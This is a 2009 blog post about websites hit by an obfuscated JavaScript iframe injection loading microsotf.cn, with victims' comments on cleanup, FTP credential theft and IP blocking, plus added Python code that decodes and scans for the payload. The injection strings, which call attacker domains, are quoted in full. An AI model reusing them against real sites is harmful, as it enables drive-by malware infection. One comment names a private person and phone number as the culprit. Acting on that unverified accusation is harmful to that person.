Web site hack loading microsotf.cn

Filed Under Hacks and Mods on 2009-07-06, 15:21

I came back from vacation to find that some of my sites had been compromised. If you also have websites that have been compromised with an iframe loading microsotf.cn, please join the conversation on freenode (chat.freenode.com) in #microsotf.cn. If you don't have an IRC client, you can use the webchat. Here are the symptoms, which will hopefully get indexed by Google and help you find this post:

The inserted code:

echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';

The syntax error that appears on PHP pages (the payload is wrapped in a single-quoted PHP echo, but the JavaScript inside uses single quotes of its own, so the PHP string ends at the first one and the next quoted fragment is the unexpected T_CONSTANT_ENCAPSED_STRING):

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

It appears the affected files are index.php, index.html and login.php.

This is the IP you should block the hell out of: 91.212.198.37
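The injected script, decoded. This is an added example written for this page, not code from the original post: the Python below decodes the two obfuscation styles quoted here, the document.write("<if"+''+'ra'+...) concatenation above and the eval("...".replace(/junk/ig, "")) variant a commenter reports further down, pulls the iframe target out of the result, and checks the PHP wrapping that produces the parse error. The two sample inputs are the payloads copied from this page; the function names are mine.

```python
"""Decode the obfuscated document.write() injections quoted on this page."""
import re

# One JS string literal, double- or single-quoted, with backslash escapes.
_LIT = r'(?:"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')'
_JS_STR = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
# Variant 1: document.write("<if"+''+'ra'+"m"+...)   (string concatenation)
_CONCAT = re.compile(r'document\.write\(\s*(' + _LIT + r'(?:\s*\+\s*' + _LIT + r')*)\s*\)')
# Variant 2: eval("d((*)&!o$^!%c...".replace(/junk1|junk2|.../ig, ""))
_EVAL_REPLACE = re.compile(
    r'eval\(\s*"((?:[^"\\]|\\.)*)"\s*\.replace\(\s*/((?:[^/\\]|\\.)*)/([a-z]*)\s*,\s*""\s*\)\s*\)')
_IFRAME_SRC = re.compile(r'<iframe\b[^>]*\bsrc=["\']?([^"\'\s>]+)', re.IGNORECASE)


def _unescape(s):
    """Undo the JS escapes these payloads use: a backslash before a quote, slash or backslash."""
    return re.sub(r'\\(["\'/\\])', r'\1', s)


def decode_concat(js):
    """Return the joined text of every complete document.write("a"+'b'+...) call."""
    results = []
    for m in _CONCAT.finditer(js):
        pieces = [_unescape(dq + sq) for dq, sq in _JS_STR.findall(m.group(1))]
        results.append(''.join(pieces))
    return results


def decode_eval_replace(js):
    """Return what eval() would run: the string with the junk tokens named in
    its own .replace(/.../ig, "") regex deleted, using that regex as given."""
    results = []
    for m in _EVAL_REPLACE.finditer(js):
        source, junk_regex, flags = m.groups()
        junk = re.compile(junk_regex, re.IGNORECASE if 'i' in flags else 0)
        results.append(junk.sub('', source))
    return results


def iframe_targets(decoded_strings):
    """URLs of any <iframe src=...> in the decoded output."""
    return [m.group(1) for s in decoded_strings for m in _IFRAME_SRC.finditer(s)]


def php_single_quoted_echo_is_broken(php):
    """True when an echo '...' statement contains an unescaped single quote
    before its terminating ';'. That is what turns the injection into the
    'unexpected T_CONSTANT_ENCAPSED_STRING' parse error on PHP pages."""
    m = re.search(r"echo\s*'", php)
    if not m:
        return False
    body, i = php[m.end():], 0
    while i < len(body):
        if body[i] == '\\' and i + 1 < len(body) and body[i + 1] in "'\\":
            i += 2            # \' and \\ are the only escapes inside PHP single quotes
            continue
        if body[i] == "'":
            return not body[i + 1:].lstrip().startswith(';')
        i += 1
    return True               # string never terminated at all


def analyze(text):
    """Everything the decoder can say about one file's contents."""
    decoded = decode_concat(text) + decode_eval_replace(text)
    return {"decoded": decoded,
            "iframe_src": iframe_targets(decoded),
            "php_echo_broken": php_single_quoted_echo_is_broken(text)}


# Sample inputs: the two payloads quoted on this page, copied verbatim.
SAMPLE_CONCAT = r"""echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';"""
SAMPLE_EVAL = r"""<script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]</((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>"""

if __name__ == "__main__":
    for sample in (SAMPLE_CONCAT, SAMPLE_EVAL):
        print(analyze(sample))
```

The first sample decodes to `<iframe src="http://microsotf.cn/" width=1 height=2></iframe>` and is flagged as a broken PHP echo; the second decodes to `document.write('</iframe>');`, which is all the quoted fragment contains. The decoder only returns document.write() calls whose string list is complete: a copy that is cut off inside a literal at the closing </script> (as in some of the snippets commenters posted) is a JavaScript syntax error in the browser and is skipped here too.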


Comments

  • ET
    I'm in the clear too so far.
  • Oliver
    Day 5 and I think I am in the clear :) :) :)
  • ET
    Day 4 for me too
    setting permissions in Filezilla (index pages now 644), cleaning out the bad script in index pages, blocking IP, updating Adobe Acrobat Reader, changing passwords (although that didn't work in the past), disabling anonymous FTP in CPanel for Bluehost clients, doing scans with AVG and Malwarebytes (scanning never found anything in the past though), turning "register_globals" to "Off" in my php.ini file for my online store--I think those are all the steps I took. One step I didn't take yet but will is to update Cubecart for my online store. Not many people are posting anymore so I wonder if this hacker is busted.
  • Oliver
    Day 4 and still clean...I think my solution worked :)
  • Oliver
    Day 3 and still untouched
  • ET
    Oliver,
    Thank you for your answer. I will take those steps. I get so nervous too. My heart drops when I see that stupid script in my client's index pages.
  • Oliver
    The site is actually mine and it is a Vbulletin site. There is no virus anywhere because the script was supposed to redirect anyone that clicked on it to another site with the virus on it. Unfortunately for whoever wrote the code, Vbulletin only interpreted it as a Parse error and would show you which file the error was on and which line of code.
    This is what shows up as the error where ** is my site directory:

    Parse error: syntax error, unexpected ';', expecting T_VARIABLE or '$' in /**/**/**/showthread.php on line 352
  • Oliver
    Day 2 and site is still untouched even though I see many hits from IP's in China, Russia, Kazakhstan, Norway and many others. Fingers are crossed and I get nervous every time I click on my site.
  • ET
    Oliver,
    How did you disable your FTP accounts? Within the CPanel of the hosts?
  • Oliver
    Actually I disabled anonymous FTP and deleted an FTP account of one of my admins. Checking through the logs, I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised. I did all these actions through the hosts Cpanel.
  • ET
    In response to this: "I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised." Does that mean that your client now has this virus and he needs to take all the measures you did to secure his computer and/or site?
  • Oliver
    The only way I have found to stop this is to disable all FTP accounts. That has solved all my problems but again, I am sure this is not an option for most of you. Sorry
  • ET
    My client needs her site fixed and I can not figure out how this hacker is getting in. Her site is plain html and I'm using Filezilla. AVG and Malwarebytes are not finding it. Now google is saying this when you type in her site in google "this site may harm your computer". This is just awful. Now I have to deal with google. I've had her change her password and I stopped ftping her index page for a week but the hack keeps coming back. I also learned today to set permissions in Filezilla by right clicking on the index page but I don't know if that will work yet. I also blocked IP addresses today (91.212.198.37, correct)? I also talked with her hosting for a long time and they told me to go to safeweb.norton.com and enter microsotf.cn to see what comes up and I did that and 2 viruses were listed but that doesn't help me. Is the only way to solve this by switching to SFTP? How do you even do that? Should I do a system restore? Is there anyone who can answer my questions?
  • Oliver
    Forgot to mention that a lot of these attacks are from China
  • Oliver
    I removed all FTP access from my site and the problem is solved. This is fine with me as nobody needs FTP for my site. Unfortunately for some of you, this isn't the case but it seems this is definitely an FTP issue.
  • Spencer
    This has happened a few times on my sites, and have had a read through your comments.

    I have not used Filezilla, only used Dreamweaver's built in FTP program. It has attached my ASP and PHP files, and now links to http://vipprojects.cn.

    The hosting company says its down to script vulnerabilities in my site. Any suggestions, as this seems like something that doesn't want to go away!
  • cindy
    Hi, I posted 2 weeks ago and I'm checking in to see what problems are still circling, or if there are new variants of the updatedate.cn. My websites that were infected were the ones to which I had recently uploaded changes. Other sites were not compromised if I hadn't touched them. I'm using Dreamweaver FTP.

    I also somehow had a backdoor setup/ trojan downloader, the fake security alert problem, and finally, porn sites popping open on my machine. It was horrible. My other machine got infected from visiting a site that had the sheur virus and it was nasty to get rid of it. I think I got every bad hack within the 2-week period beginning July 3.

    So far, with the changed passwords on all FTP accounts, the sites are fine. It's been 2 weeks. I still check them all nervously though.
  • ET
    Some of my Web clients got infected so I had them all change their passwords. I use Filezilla to FTP. I thought that the common denominator was Filezilla but other posters FTP'd using other programs. I had my web client change her password and I never found out what she changed it to and have not FTP'd her files since the new password and she got hacked again. So we do know that changing passwords doesn't work. But someone wrote and said you must get the virus out of your computer first before you deal with changing passwords. According to the above post, is this the virus?: fin Sheur2 Trojan. Should I stop using Filezilla and instead use Dreamweaver to FTP?
  • Guest
    Okay, I've run just about every spyware program around and found a few infections on my main computer.

    However, I also noticed that one site I had connected to using SFTP was not affected while the ones I used Filezilla or dreamweaver (with FTP) were affected.

    Have switched to SFTP on everything and am keeping fingers crossed. Hope this helps anyone with the problem and would appreciate hearing more from people who have fixed the issue. From the number of posters that have stopped posting, it looks like they may have fixed this.
  • Nick
    This spyware affects all files that have common filenames.

    index, main, default, home, and more I assume.

    I use globalscape cuteftp and all of my sites that I access on a normal basis were infected.

    Some sites were crawled by google and categorized as malicious.

    Even some sites that I did not access recently were infected.

    I have to assume that it is a spyware that reads FTP logs/saved passwords on your computer, then later on FTPs in with admin access and overwrites a bunch of files.

    Clean PC.
    Change FTP passwords.
    Re-upload indexes.
  • Guest
    Nick,

    Did you find a specific virus or trojan on your computer? Trying to figure out if more than my FTP was compromised. I had the updatedate.cn code on one index, but they entered into at least one other site which I can't find any changes on. It had hackersafe running on it, not sure if that was a deterrent or not, but they did avoid those sites.
  • Nick
    Spybot was unable to find and remove it.

    I fixed it by doing a system restore and THEN a scan. It found a lot of stuff, but as usual, most of it is weird cookie stuff so I didn't pay attention to any specifics.

    I manually deleted a few files in the system32 directory.

    When I was infected, I had all sorts of problems, including a new desktop background saying I was infected. All these issues were rectified by system restore.

    I would just check all files that have index* in their name and see if anything was changed. Or, do a search on your server for files changed within certain dates.

    I have a theory, that it disguises itself as an adobe update or a java update, one of those.
  • Dan
    They changed my index.php file as well as adding some subdirectories that looked like they should exist. Things like /language and /js were showing up as sub folders with a bunch of crap that they shouldn't have.

    I would suggest upgrading your wordpress install and then deleting everything from the directory trees and files that do not have a modified date of the day you ran the update. Save a few files like the wp-config.php and your upload directory.

    I had to do that a few times to catch everything along with change my FTP passwords on all my sites and then I blocked specific IP addresses that were generating bad traffic to my site. I then had to manually edit all the index.php files and remove the extra script tags it added to the bottoms of each page. After all that finally it has been 3 weeks and I think I might be free!
  • Guest
    Where have you guys found infections? I only found the code on the index file of the main site. Did anyone find hidden snippets in wordpress files or any database intrusions? Also, from my FTP logs, it only looks like they were signed in briefly. It appeared the index file was the only one pulled.

    Lastly, if a trojan is found, do you have to reformat the comp or just pull the infection?
  • brainasium
    @Name. I used WS-FTP and still got the problem. I don't believe its just a FileZilla problem.
  • brainasium
    Appears that there is a variant updatedate.cn. I have cleaned up my files 4 times already. Changed ftp passwords. Changed root password. Unfortunately I cannot use SFTP because the damn host doesn't support it. Chrome and Firefox continue to give Malware warnings on exploited pages. Terrible for business.
  • Dan
    Does anyone have LiberKey installed on a pen drive??? That's where i found some viruses and trojan horses including the one mentioned above.
  • Name
    I posted the reply two above this one. I found the solution. What happens is you get a virus, and it steals your Filezilla history file. I have 4 computers, and around 10 ftp accounts on different domains/servers. We had 4 sites hit on personal server, and on my work server 2 accounts were hit. I was the only one that logged into those sites. On my computers only 1 had logged into the 2 work ftp accounts. That computer was compromised. I did a virus scan and came up with nothing in AVG, however, I rescanned with NOD32 and it discovered a fin Sheur2 Trojan.

    That trojan I have linked to the stolen Filezilla file. I have since formatted that computer, and all is well. Make sure you change all FTPs AFTER removing the virus. But that's the easiest way to determine which PC was hit if you have multiple, match the access log to the Filezilla history.
  • Guest
    I got hacked around the 13th. They entered and put the code in the index file of one site, though they got into a second account and did not change the code. I was using Filezilla at the time and didn't have wordpress updated to the latest edition.

    I went ahead and blocked IPs, but was wondering if any of the earlier posters have had any success in getting rid of these SOBs via password changes, shift to SFTP etc.
    Thanks in advance for any help
  • Name
    What exactly is causing this? Some douchebag modified index files in 6 of our sites, logging into FTP with the correct password for EACH site. Each site uses a different, completely random password.
  • Phil
    Who here is using Filezilla and got this hack? Raise your hand.

    *Raises hand* ..

    here's a post I made on another blog:

    Ok, about 8 of my websites were hit by this microsotf.cn iFrame script. And here’s the really troubling part: the code was inserted not just into index.php files, but also into TEMPLATE files located in a separate (non browsable) directory. Could be because the affected template files are called main.html, so some automated process thought it was an index equivalent, but much more lamely it could mean that there is live (human) intervention into the code-installation process.

    I fixed all of the files, reset my ftp password, and have had two of my sites re-hacked since then.

    This is the first I’ve heard about the possibility of FTP password files being compromised by malware or what-have-you, so I will try deleting all those saved passwords, resetting passwords on the server side (again), and maybe even switching ftp clients (right now I use Filezilla).

    Just out of curiosity, WHO HERE IS USING FILEZILLA AND HAS BEEN HACKED? Raise your hand!

    *Raises hand*

    There’s gotta be some pattern.

    -Phil
  • I was using Filezilla on the machine that was compromised. This is definitely one of the targeted FTP clients.
  • Name
    This malware affected each website I worked on during the last week. Sites I didn't update were not affected. I replaced all the affected index files last night and continue to monitor the index date-stamps via FTP.

    I found this morning that the bugger re-infected 2 of 4 previously infected sites. The script was re-introduced to the 2 websites where I *did not* yet change the password. Now I've changed the FTP password on those as well; hopefully it's done!!!
  • C4talyst
    Blocking IPs is worthless at stopping this...CHANGE YOUR FTP PASSWORDS. Better yet, stop using ftp...use sftp.
  • Name
    Just pulled the latest code from a site which contains updatedate.cn which is live and waiting with an empty site.
  • Dan
    This hit all 3 of my sites and has been driving me nuts to clear. I used cpanel to deny IPs to the ones you listed and I have taken out that awesome script from my index.php files and hopefully it is gone forever!
  • Name
    D'Oh! I meant second line, sorry :blush:
  • Name
    Shouldn't that first iptables line be:-

    iptables -A INPUT -m iprange --src-range 68.161.247.0-68.161.247.255 -j DROP

    ?
  • flandercan
    Hi,

    I run a number of servers and only found this hack on an SMF forum on one of the accounts. The files are being changed using FTP. I have lots of evidence in my logs.

    I'm using Ubuntu servers and used the following command to find all the altered files:

    > grep -r kPvOkYUlTEBvLmAPjYUP *

    Also used iptables to block the IPs seen in logs (Yes more than one)

    iptables -A INPUT -m iprange --src-range 91.212.198.0-91.212.198.255 -j DROP
    iptables -A INPUT -m iprange --src-range 68.161.24.0-68.161.24.255 -j DROP
    iptables -A INPUT -m iprange --src-range 91.212.19.0-91.212.19.255 -j DROP

    91.212.198.x - Goes back to a linux or unix boxes
    68.161.247.75 - Goes back to a MS2003 Small business server (And looks like its owned by www.euromediapartners.co.uk) although their web server is on a different address.

    I found the hack in index.php, main.php, index.html and login.php

    FTP log shows these ips attacking a specific account to get the password then over approx 1 week accessing the site every day at different times.

    Thanks
    Paul Flanders
    www.fcconsultancy.co.uk
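Two of the checks described in this thread, Nick's "search on your server for files changed within certain dates" and the grep -r for a known marker string above, combined into one triage scan over a web root. This is an added example written for this page, not a tool any commenter used: the signature regexes are derived from the payload shapes quoted on this page, the filename list is the one the thread reports (index, main, default, home, login), and the fixture files, the example.invalid host and the @@ junk token are constructed here for the demo.

```python
"""Triage a web root for the index/main/default/login injection: report files
that carry an injection signature, or that are usual targets and changed
inside a given window."""
import os
import re
import tempfile
import time

# Filename stems the thread reports being rewritten; any extension.
TARGET_STEMS = {"index", "main", "default", "home", "login"}

# Signatures derived from the code quoted on this page.
SIGNATURES = {
    "concat_iframe": re.compile(r'document\.write\(\s*"<if"\s*\+'),
    "eval_replace":  re.compile(r'eval\(\s*"[^"]*"\s*\.replace\(\s*/[^/]*/ig\s*,\s*""\s*\)\s*\)'),
    "tiny_iframe":   re.compile(r'<iframe\b[^>]*\bheight=["\']?[12]["\']?\s*>', re.IGNORECASE),
}


def classify_file(path):
    """Names of the signatures found in one file (empty list if clean)."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_webroot(root, changed_since):
    """Walk root and return findings sorted by path. A file is reported when it
    matches a signature, or when it is a usual target (index.*, main.*, ...)
    and its mtime is at or after changed_since (epoch seconds)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            stem = name.rsplit(".", 1)[0].lower()
            hits = classify_file(path)
            recent = os.path.getmtime(path) >= changed_since
            if hits or (recent and stem in TARGET_STEMS):
                findings.append({
                    "path": os.path.relpath(path, root).replace(os.sep, "/"),
                    "signatures": hits,
                    "usual_target": stem in TARGET_STEMS,
                    "modified_recently": recent,
                })
    return sorted(findings, key=lambda f: f["path"])


# Constructed fixture (not from any real server): one injected index page,
# one injected template, one clean page, and an untouched old index. The
# snippets keep only the shape of the page's payloads; hosts are placeholders.
INJECT_CONCAT = ('<script>document.write("<if"+\'\'+\'ra\'+"me src=\\"http://example.invalid/\\" '
                 'width=1 height=2></iframe>");</script>')
INJECT_EVAL = '<script>eval("d@@o@@c@@ument.write(\'x\');".replace(/@@/ig, ""))</script>'


def build_fixture(base, now):
    """Write the fixture files under base; return the start of the 'changed since' window."""
    week_ago = now - 7 * 86400
    files = {
        "index.php":           "<?php include 'header.php'; ?>\n<p>hello</p>\n" + INJECT_CONCAT,
        "templates/main.html": "<html><body>template</body></html>\n" + INJECT_EVAL,
        "about.html":          "<html><body>about us</body></html>\n",
        "old/index.html":      "<html><body>untouched</body></html>\n",
    }
    for rel, body in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (now, now))
    old = os.path.join(base, "old/index.html")
    os.utime(old, (week_ago - 86400, week_ago - 86400))   # predates the window
    return week_ago


def demo():
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        now = time.time()
        return scan_webroot(base, build_fixture(base, now))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point it at the real document root with `scan_webroot("/var/www/site", since)` where `since` is the epoch time of your last known-good upload. Treat the date half as a hint only: an uploader can set a file's modification time, so the signature match is the part to rely on, and a clean scan says nothing about the FTP credentials that let the files be written in the first place.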
  • acenterprise
    http://rockymountainenvironmental.com/
    07/04/09 --- 8:16am
    Altered files: index.htm, index.html, default.asp, main.html
    Offending Code: <script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2>');</script><script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2>');</script><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script>
    The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

    07/09/09 --- 6:11AM
    NEW OFFENDING CODE
    <script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]</((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>
    This redirect bypassed my script calls and proceeded to download malware.
    Malware: [braviax (fakealert Trojan)]& [ID12 Undetermined self replicating virus]
    I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don't have access or admin rights to .htaccess. Best of luck to all.
    REDIRECT ADDRESSES: (Do not Use: http://updatedate.cn) OR
    (Do not Use: http://microsotf.cn )
    (Allen)
  • Guest
    ace,

    have you had any problems after removing the trojans? What did you do to clear your computer?

    Also, have you switched from unsecure FTP to SFTP, changed computers, etc?
  • Randy
    The safe side is to block all their servers from 91.212.*.*, unless of course you do regular business with the russian students' bots. ;-)
  • Randy
    Seems to be originating from the Academy of Sciences, Federation of Russia (Their equivalent to our ITT Tech) using their campus servers in Kazakhstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214
  • Darren
    I am having the same issue with our company site, is there a permanent fix for this?
  • if you have a server administrator contact them. If you're on a shared hosting plan, contact them, and click the link below for a tutorial on blocking IPs using htaccess.

    http://www.clockwatchers.com/htaccess_block.html
  • Little bastard crawled through my sites and hit most of them - sites spread across three servers. Makes me wonder what the endgame is - malware, fake traffic, etc...dicks.

    Thanks for the post.
  • Eddie H
    Mine too. I have restored my original index.html and index.php files, but a few hours later, the sites are hacked again. I have my files all set to 644, yet how are they continuing to hack in? Nasty bugger!